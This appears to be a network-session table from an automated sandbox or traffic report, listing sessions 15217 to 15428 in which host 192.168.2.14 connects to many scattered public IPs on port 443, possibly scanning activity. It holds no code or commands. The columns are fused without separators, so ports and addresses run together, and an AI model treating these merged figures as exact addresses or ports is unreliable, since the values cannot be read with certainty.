                                                        15217192.168.2.144111694.141.27.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15218192.168.2.1460196179.1.193.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15219192.168.2.144077699.127.29.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15220192.168.2.1445106212.22.102.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15221192.168.2.1459140210.115.217.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15222192.168.2.1443094220.63.200.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15223192.168.2.1436658131.200.243.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15224192.168.2.145787043.219.114.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15225192.168.2.1433458190.183.109.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15226192.168.2.145458295.255.179.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15227192.168.2.146074034.25.40.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15228192.168.2.1454166124.31.218.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15229192.168.2.1438920143.80.252.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15230192.168.2.143987482.119.99.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15231192.168.2.1445114195.127.47.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15232192.168.2.1455366156.112.44.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15233192.168.2.1457762220.202.211.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15234192.168.2.1440770175.137.17.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15235192.168.2.145461044.249.138.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15236192.168.2.1434972176.88.213.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15237192.168.2.1443574181.144.96.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15238192.168.2.144663890.200.219.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15239192.168.2.143717219.106.38.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15240192.168.2.143770476.156.133.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15241192.168.2.146001412.203.73.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15242192.168.2.1449912194.124.171.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15243192.168.2.1449632133.174.184.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15244192.168.2.1458028110.166.38.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15245192.168.2.1456642180.191.61.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15246192.168.2.1439820155.141.248.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15247192.168.2.1456222122.135.34.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15248192.168.2.145781461.76.180.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15249192.168.2.1451168192.203.113.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15250192.168.2.1440026141.118.71.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15251192.168.2.1444494200.180.76.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15252192.168.2.144904213.240.243.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15253192.168.2.1442456223.57.119.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15254192.168.2.145399849.152.13.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15255192.168.2.1457540115.177.51.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15256192.168.2.1454106216.76.240.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15257192.168.2.1446556194.116.112.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15258192.168.2.14392789.59.129.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15259192.168.2.1434260219.207.63.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15260192.168.2.1455498165.182.218.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15261192.168.2.1447456210.84.168.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15262192.168.2.1459892223.25.148.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15263192.168.2.143841213.183.107.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15264192.168.2.1446850173.47.2.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15265192.168.2.143432674.235.64.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15266192.168.2.1446596176.124.113.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15267192.168.2.1453484152.49.158.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15268192.168.2.1438446183.157.188.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15269192.168.2.1452940163.18.62.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15270192.168.2.1436224216.218.125.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15271192.168.2.1434770204.68.151.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15272192.168.2.1446654156.127.137.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15273192.168.2.1442936195.125.179.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15274192.168.2.1458546111.80.251.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15275192.168.2.1456860175.194.178.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15276192.168.2.1455804154.36.82.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15277192.168.2.1452590170.163.217.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15278192.168.2.1456354211.41.93.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15279192.168.2.1439102213.92.16.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15280192.168.2.1439248103.2.56.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15281192.168.2.14521945.42.1.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15282192.168.2.1446430144.66.41.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15283192.168.2.1447412141.121.63.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15284192.168.2.145747046.72.20.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15285192.168.2.145983884.127.142.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15286192.168.2.1447726217.41.69.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15287192.168.2.145693665.251.67.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15288192.168.2.143982458.166.199.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15289192.168.2.1447976116.181.213.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15290192.168.2.1450254182.118.175.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15291192.168.2.1445262183.102.36.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15292192.168.2.1437706198.248.77.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15293192.168.2.1449724183.233.0.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15294192.168.2.145433842.243.184.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15295192.168.2.146042027.130.24.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15296192.168.2.1436952143.224.252.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15297192.168.2.1433002202.24.36.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15298192.168.2.1452086153.79.28.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15299192.168.2.1460798169.148.245.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15300192.168.2.14586825.236.72.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15301192.168.2.143940292.124.100.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15302192.168.2.143696818.210.179.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15303192.168.2.143751219.146.3.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15304192.168.2.1437912139.27.16.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15305192.168.2.14391785.186.166.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15306192.168.2.1444950129.179.198.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15307192.168.2.145179627.40.219.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15308192.168.2.1451866183.87.49.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15309192.168.2.145480039.56.76.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15310192.168.2.144594866.240.126.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15311192.168.2.143510086.211.145.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15312192.168.2.1453438138.51.82.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15313192.168.2.1455450173.105.179.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15314192.168.2.1456332223.50.33.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15315192.168.2.1458354193.26.76.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15316192.168.2.1453316126.118.7.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15317192.168.2.145940245.88.193.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15318192.168.2.1458312178.173.175.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15319192.168.2.145266475.18.58.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15320192.168.2.1449674187.52.0.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15321192.168.2.1434630121.104.180.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15322192.168.2.1454170223.86.100.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15323192.168.2.14349525.133.135.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15324192.168.2.1438458171.19.42.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15325192.168.2.145163253.90.214.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15326192.168.2.1456410116.173.39.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15327192.168.2.1459784206.244.93.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15328192.168.2.144762618.45.232.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15329192.168.2.1458492125.63.206.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15330192.168.2.1443724223.174.50.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15331192.168.2.1447060129.130.151.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15332192.168.2.1451932141.174.92.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15333192.168.2.1442646167.124.77.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15334192.168.2.144008849.171.228.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15335192.168.2.143950461.99.171.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15336192.168.2.1447288209.248.241.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15337192.168.2.143787263.145.16.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15338192.168.2.143626431.209.55.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15339192.168.2.1458166131.233.119.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15340192.168.2.1446524139.124.58.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15341192.168.2.1453426219.75.175.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15342192.168.2.1444094199.44.89.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15343192.168.2.145348481.111.72.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15344192.168.2.1448352146.16.228.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15345192.168.2.1454942163.141.10.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15346192.168.2.1454860107.39.251.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15347192.168.2.144511062.216.115.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15348192.168.2.1434858124.134.83.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15349192.168.2.1439766199.103.122.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15350192.168.2.144061845.227.94.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15351192.168.2.1457592100.189.245.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15352192.168.2.144445423.100.244.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15353192.168.2.145158023.42.202.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15354192.168.2.1438996103.234.196.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15355192.168.2.144074660.1.139.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15356192.168.2.1454886132.132.234.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15357192.168.2.143379819.171.108.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15358192.168.2.1457124192.182.253.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15359192.168.2.146094246.60.23.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15360192.168.2.1451470130.101.39.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15361192.168.2.1453084152.5.160.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15362192.168.2.143433439.163.116.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15363192.168.2.1435178154.174.249.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15364192.168.2.144760077.166.55.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15365192.168.2.1450702183.140.72.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15366192.168.2.1443890190.13.96.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15367192.168.2.1439112208.238.120.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15368192.168.2.14437529.61.176.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15369192.168.2.144464248.223.11.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15370192.168.2.1441428217.109.107.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15371192.168.2.1438302143.178.80.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15372192.168.2.145415078.208.206.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15373192.168.2.1432794107.108.108.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15374192.168.2.1437368120.203.21.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15375192.168.2.1447006153.54.226.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15376192.168.2.144196251.55.36.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15377192.168.2.143944478.75.58.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15378192.168.2.1453834102.57.9.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15379192.168.2.144127685.158.54.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15380192.168.2.1443262128.19.12.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15381192.168.2.145403874.149.132.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15382192.168.2.1452234132.58.128.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15383192.168.2.1442950205.83.203.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15384192.168.2.1438016141.9.239.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15385192.168.2.1438880197.87.177.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15386192.168.2.1440394213.174.63.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15387192.168.2.1449386154.162.88.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15388192.168.2.1446540161.251.171.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15389192.168.2.14360982.10.127.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15390192.168.2.1454360204.190.76.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15391192.168.2.1459644219.37.51.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15392192.168.2.1444048128.85.255.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15393192.168.2.1456328181.179.213.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15394192.168.2.1460848212.67.188.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15395192.168.2.1437950175.221.63.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15396192.168.2.1449396109.113.167.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15397192.168.2.1445878119.246.242.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15398192.168.2.144585881.28.68.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15399192.168.2.1450098174.130.102.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15400192.168.2.1454486102.192.194.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15401192.168.2.1450564218.210.67.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15402192.168.2.1439658136.83.87.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15403192.168.2.145842880.90.209.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15404192.168.2.1452040130.194.206.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15405192.168.2.144713289.32.40.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15406192.168.2.1451790208.123.186.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15407192.168.2.1441478207.236.70.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15408192.168.2.143481644.46.191.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15409192.168.2.1459512177.46.193.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15410192.168.2.1458226176.61.156.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15411192.168.2.1452550190.30.87.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15412192.168.2.1446926106.7.154.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15413192.168.2.145305088.150.31.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15414192.168.2.145204896.130.122.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15415192.168.2.1446886199.72.149.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15416192.168.2.1435602182.171.253.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15417192.168.2.1438268211.107.102.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15418192.168.2.1440686165.88.35.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15419192.168.2.1454616137.18.121.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15420192.168.2.1443104186.104.177.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15421192.168.2.1434508141.186.183.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15422192.168.2.145884423.37.143.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15423192.168.2.145848286.48.37.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15424192.168.2.1439582205.231.219.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15425192.168.2.143605690.50.102.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15426192.168.2.145844262.253.43.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15427192.168.2.1446912141.129.209.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15428192.168.2.144209682.11.177.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
